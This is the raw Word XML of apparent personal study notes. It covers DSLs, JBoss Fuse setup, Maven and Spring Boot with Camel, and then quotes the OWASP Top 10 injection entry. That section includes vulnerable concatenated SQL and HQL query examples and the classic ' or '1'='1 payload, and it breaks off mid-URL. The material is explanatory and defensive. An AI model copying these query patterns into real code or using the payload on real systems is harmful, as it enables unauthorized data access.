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9EB" w:rsidRDefault="00B00CAF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>DSL:</w:t>
      </w:r>
      <w:r w:rsidR="00320E79" w:rsidRPr="00320E79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00320E79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>A keyword input file to an application that receives input data is a </w:t>
      </w:r>
      <w:r w:rsidR="00320E79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DSL</w:t>
      </w:r>
      <w:r w:rsidR="00320E79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. A configuration file is a </w:t>
      </w:r>
      <w:r w:rsidR="00320E79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DSL</w:t>
      </w:r>
      <w:r w:rsidR="00320E79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00320E79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>makefile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00320E79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidR="00320E79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DSL</w:t>
      </w:r>
      <w:r w:rsidR="00320E79">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> used to specify rules and dependencies for building an application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00320E79" w:rsidRDefault="00320E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00320E79" w:rsidRDefault="00320E79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D067A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Curf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder , we need to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>user.properties</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> for removing comment on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>userid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> and password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00320E79" w:rsidRDefault="008470F9">
      <w:r>
        <w:t xml:space="preserve">In bin folder === </w:t>
      </w:r>
      <w:r w:rsidRPr="008470F9">
        <w:t>jboss-fuse-6.3.0.redhat-187\bin</w:t>
      </w:r>
      <w:r>
        <w:t>\karaf.bat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008470F9" w:rsidRDefault="008470F9"/>
    <w:p w:rsidR="00F06E9C" w:rsidRDefault="00F06E9C">
      <w:r>
        <w:t xml:space="preserve">Build tool is maven. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A53F5F" w:rsidRDefault="00A53F5F"/>
    <w:p w:rsidR="00A53F5F" w:rsidRDefault="00A53F5F">
      <w:r>
        <w:t xml:space="preserve">Spring boot with </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>camel :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websrvice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F678C2" w:rsidRDefault="00F678C2"/>
    <w:p w:rsidR="00F678C2" w:rsidRDefault="00F678C2"/>
    <w:p w:rsidR="00F678C2" w:rsidRDefault="00F678C2">
      <w:r>
        <w:t xml:space="preserve">Fuse </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ide :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has the less support for transformation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F678C2" w:rsidRDefault="00380DE5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D34EEC9" wp14:editId="7393FC08">
            <wp:extent cx="5943600" cy="2851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1150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRDefault="002F1F2E"/>
    <w:p w:rsidR="002F1F2E" w:rsidRDefault="002F1F2E"/>
    <w:p w:rsidR="002F1F2E" w:rsidRDefault="002F1F2E"/>
    <w:p w:rsidR="002F1F2E" w:rsidRDefault="002F1F2E"/>
    <w:p w:rsidR="002F1F2E" w:rsidRDefault="002F1F2E"/>
    <w:p w:rsidR="002F1F2E" w:rsidRDefault="002F1F2E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Top 10 vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRPr="002F1F2E" w:rsidRDefault="002F1F2E" w:rsidP="002F1F2E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="AAAAAA"/>
        </w:pBdr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="43"/>
          <w:szCs w:val="43"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="43"/>
          <w:szCs w:val="43"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Open Web Application Security Project</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRDefault="002F1F2E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRDefault="002F1F2E" w:rsidP="002F1F2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A1: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Injection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRDefault="002F1F2E" w:rsidP="002F1F2E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        </w:rPr>
        <w:t>Injection flaws, such as SQL, OS, XXE, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRDefault="002F1F2E" w:rsidP="002F1F2E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        </w:rPr>
        <w:t>For SQL calls, use bind variables in all prepared statements and stored procedures, or avoid dynamic queries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRPr="002F1F2E" w:rsidRDefault="002F1F2E" w:rsidP="002F1F2E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #1:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> An application uses untrusted data in the construction of the following </w:t>
      </w:r>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> SQL call:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRPr="002F1F2E" w:rsidRDefault="002F1F2E" w:rsidP="002F1F2E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">String query = "SELECT * FROM accounts WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>custID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">='" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"id") + "'";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRPr="002F1F2E" w:rsidRDefault="002F1F2E" w:rsidP="002F1F2E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #2:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g., Hibernate Query Language (HQL)):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRPr="002F1F2E" w:rsidRDefault="002F1F2E" w:rsidP="002F1F2E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Query </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HQLQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>session.createQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">"FROM accounts WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>custID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">='" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>("id") + "'");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRPr="002F1F2E" w:rsidRDefault="002F1F2E" w:rsidP="002F1F2E">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In both cases, the attacker modifies the ‘id’ parameter value in her browser to send: </w:t>
      </w:r>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' or '1'='1</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRPr="002F1F2E" w:rsidRDefault="002F1F2E" w:rsidP="002F1F2E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1F2E">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://example.com/app/accountView</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F1F2E">
